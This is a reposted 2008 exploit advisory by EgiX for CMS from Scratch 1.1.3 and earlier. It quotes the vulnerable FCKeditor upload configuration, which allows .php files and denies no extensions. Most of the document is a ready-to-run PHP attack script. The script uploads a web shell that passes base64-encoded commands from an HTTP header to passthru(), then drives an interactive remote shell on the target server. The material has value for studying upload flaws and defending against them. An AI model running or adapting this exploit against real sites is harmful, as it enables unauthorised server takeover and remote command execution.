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CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
来源:n0b0d13s[at]gmail[dot]com 作者:EgiX 发布时间:2008-05-30  

CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.[1].: http://cmsfromscratch.com/
link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)

[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php

27. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
28. // WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only
29. // authenticated users can access this file or use some kind of session checking.
30. $Config['Enabled'] = true ; <======
32. $path = $_SERVER["REQUEST_URI"] ;
33. $relativePathFromWebServerRoot =  substr($path, 0, strpos($path, "/", 1) );
34. // Coming out as /CMS, why???
38. // Path to user files relative to the document root.
39. // This is what is inserted into the HTML markup
40. $Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
41. if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
43. // Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
44. // Attention: The above 'UserFilesPath' must point to the same directory.
45. // BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
46. $Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
48. // Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
49. $Config['ForceSingleExtension'] = true ;
50. // Perform additional checks for image files
51. // if set to true, validate image size (using getimagesize)
52. $Config['SecureImageUploads'] = true;
53. // What the user can do with this connector
54. $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
55. // Allowed Resource Types
56. $Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
57. // For security, HTML is allowed in the first Kb of data for files having the following extensions only.
58. $Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
60. $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
61. $Config['DeniedExtensions']['File'] = array() ; <========
62. $Config['FileTypesPath']['File'] = $Config['UserFilesPath'] ;
63. $Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
64. $Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
65. $Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;

with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension

ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
$sock = fsockopen($host, 80);
while (!$sock)
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
return $resp;

print "\n+---------------------------------------------------------------+";
print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";

if ($argc < 3)
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /cms114/\n";

$host = $argv[1];
$path = $argv[2];

$data  = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
$data .= "Content-Type: unknown/unknown\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";

$packet  = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";

define(STDIN, fopen("php://stdin", "r"));

print "\ncmsfs-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
else break;


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